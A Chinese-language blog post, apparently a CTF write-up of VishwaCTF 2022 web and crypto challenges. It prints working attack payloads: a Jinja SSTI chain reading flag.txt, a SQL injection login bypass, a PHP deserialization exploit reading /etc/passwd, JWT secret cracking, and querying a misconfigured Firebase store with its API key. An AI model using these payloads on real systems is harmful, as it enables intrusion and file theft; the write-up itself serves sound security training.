VishwaCTF 2022

最新推荐文章于 2023-04-05 11:15:04 发布

Ff.cheng

最新推荐文章于 2023-04-05 11:15:04 发布

阅读量352

点赞数

分类专栏： wp 文章标签： wp

本文链接：https://blog.csdn.net/qq_53263789/article/details/123835159

版权

wp 专栏收录该内容

13 篇文章 2 订阅

订阅专栏

记录两题

Flag .Collection

一道 firebase 的题目，记录一下

首页

照例看一下网页源码，截取一下重要部分

一段混淆代码，但是有一个url

一个firebaseConfig设置

通过API KEY操作 firebase，猜测baseURL就是上面的url

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <!-- Insert these scripts at the bottom of the HTML, but before you use any Firebase services -->

    <!-- Firebase App (the core Firebase SDK) is always required and must be listed first -->
    <script src="https://www.gstatic.com/firebasejs/7.21.0/firebase-app.js"></script>

    <!-- If you enabled Analytics in your project, add the Firebase SDK for Analytics -->
    <script src="https://www.gstatic.com/firebasejs/7.21.0/firebase-analytics.js"></script>

    <!-- Add Firebase products that you want to use -->
    <script src="https://www.gstatic.com/firebasejs/7.21.0/firebase-auth.js"></script>
    <script src="https://www.gstatic.com/firebasejs/7.21.0/firebase-firestore.js"></script>
</head>
<body>

<script>
    const firebaseConfig = {
        apiKey: "AIzaSyCOrohCmYL_hq5DaqFbQM3rxHXT0pNE6SA",
        authDomain: "vishwa-ctf-challenge-12.firebaseapp.com",
        projectId: "vishwa-ctf-challenge-12",
        storageBucket: "vishwa-ctf-challenge-12.appspot.com",
        messagingSenderId: "125452069157",
        appId: "1:125452069157:web:2d20b318f3e448ebfa52cc",
		databaseURL:"https://vishwa-ctf-default-rtdb.firebaseio.com"
      };

    firebase.initializeApp(firebaseConfig);
    
    var db=firebase.firestore();
    //猜测字符为flag
    db.collection("flag").get().then((querySnapshot) => {
        querySnapshot.forEach((doc) => {
		console.log(doc.data());
            console.log(doc.data());
        });
    });
</script>
</body>
</html>

打开控制台，发现flag

FLAG：vishwaCTF{c0nfigur3_y0ur_fir3b@s3_rule$}

Hey Buddy

SSTI，payload

{{().__class__.__bases__[0].__subclasses__()[99](path=%27%27,fullname=%27%27).get_data(%27./flag.txt%27)}}

My Useless Website

sql万能密码
payload

1' or 1=1 -- +

FLAG：VishwaCTF{I_Kn0w_Y0u_kn0W_t1hs_4lr3ady}

Stock Bot

html查看到一个url

访问发现调用了 file_get_contents

猜Flag

FLAG：VishwaCTF{b0T_kn0w5_7h3_s3cr3t}

Request Me FLAG

请求头为 FLAG ，且POST一个FLAG数据，得到flag

Todo List

html 发现参数source

访问得到源码

<?php

Class ShowSource{
    public function __toString()
    {
        return highlight_file($this->source, true);
    }
}

if(isset($_GET['source'])){
    $s = new ShowSource();
    $s->source = __FILE__;
    echo $s;
    exit;
}

$todos = [];

if(isset($_COOKIE['todos'])){
    $c = $_COOKIE['todos'];
    $h = substr($c, 0, 40);
    $m = substr($c, 40);
    if(sha1($m) === $h){
        $todos = unserialize($m);
    }
}

if(isset($_POST['text'])){
    $todo = $_POST['text'];
    $todos[] = $todo;
    $m = serialize($todos);
    $h = sha1($m);
    setcookie('todos', $h.$m);
    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}
?>



<?php foreach($todos as $todo):?>
      <label class="todo">
      <input class="todo__state" type="checkbox" />
      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 200 25" class="todo__icon">
        <use xlink:href="#todo__line" class="todo__line"></use>
        <use xlink:href="#todo__box" class="todo__box"></use>
        <use xlink:href="#todo__check" class="todo__check"></use>
        <use xlink:href="#todo__circle" class="todo__circle"></use>
      </svg>
      <div class="todo__text"><?=$todo?></div>
      </label>
    <?php endforeach;?>

反序列化即可，echo触发 __toString

exp

<?php

Class ShowSource{
    public function __construct()
    {
        $this->source = '/etc/passwd'; //flag.php
    }
}
$todos[]=new ShowSource();
echo sha1(serialize($todos));
echo urlencode(serialize($todos));
?>

替换cookie中的todo

FLAG：VishwaCTF{t7e_f1a6_1s_1is73d}

Keep Your Secrets

访问路由得到 jwt

使用c-jwt-cracker进行 jwt 爆破，密钥为 owasp

修改权限为admin

FLAG：VishwaCTF{w3@k_ $e c r 3 t$ }

Strong Encryption

<?php

    // Decrypt -> 576e78697e65445c4a7c8033766770357c3960377460357360703a6f6982452f12f4712f4c769a75b33cb995fa169056168939a8b0b28eafe0d724f18dc4a7

    $flag="";

    function encrypt($str,$enKey){

        $strHex='';
        $Key='';
        $rKey=69;
        $tmpKey='';

        for($i=0;$i<strlen($enKey);$i++){
            $Key.=ord($enKey[$i])+$rKey;
            $tmpKey.=chr(ord($enKey[$i])+$rKey);
        }    

        $rKeyHex=dechex($rKey);

        $enKeyHash = hash('sha256',$tmpKey);

        for ($i=0,$j=0; $i < strlen($str); $i++,$j++){
            if($j==strlen($Key)){
                $j=0;
            }
            $strHex .= dechex(ord($str[$i])+$Key[$j]);
        }
        $encTxt = $strHex.$rKeyHex.$enKeyHash;
        return $encTxt;
    }

    $encTxt = encrypt($flag, "VishwaCTF");

    echo $encTxt;

?>

加密不难，脚本解密即可

<?php
$str2 = "576e78697e65445c4a7c8033766770357c3960377460357360703a6f6982";
$Key='155174184173188166136153139';   
	for ($i=0,$j=0; $i < strlen($str2); $i++,$j++){
		if($j==strlen($Key)){
			$j=0;
        }
        $a = $str2[$i].$str2[$i+1];
        $flag .= chr(hexdec($a)-$Key[$j]);  
        $i++;
   }
echo "flag: ".$flag;

FLAG：VishwaCTF{y0u_h4v3_4n_0p_m1nd}

参考

DownunderCTF-Web-CookieClicker | Tiaonmmn’s Littile House

Ff.cheng

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
VishwaCTF 2022

title: VishwaCTF 2022categories: 赛题wp记录两题Flag .Collection一道 firebase 的题目，记录一下首页照例看一下网页源码，截取一下重要部分一段混淆代码，但是有一个url一个firebaseConfig设置通过API KEY操作 firebase，猜测baseURL就是上面的url<!DOCTYPE html><html lang="en"><head> <meta .
复制链接

扫一扫

专栏目录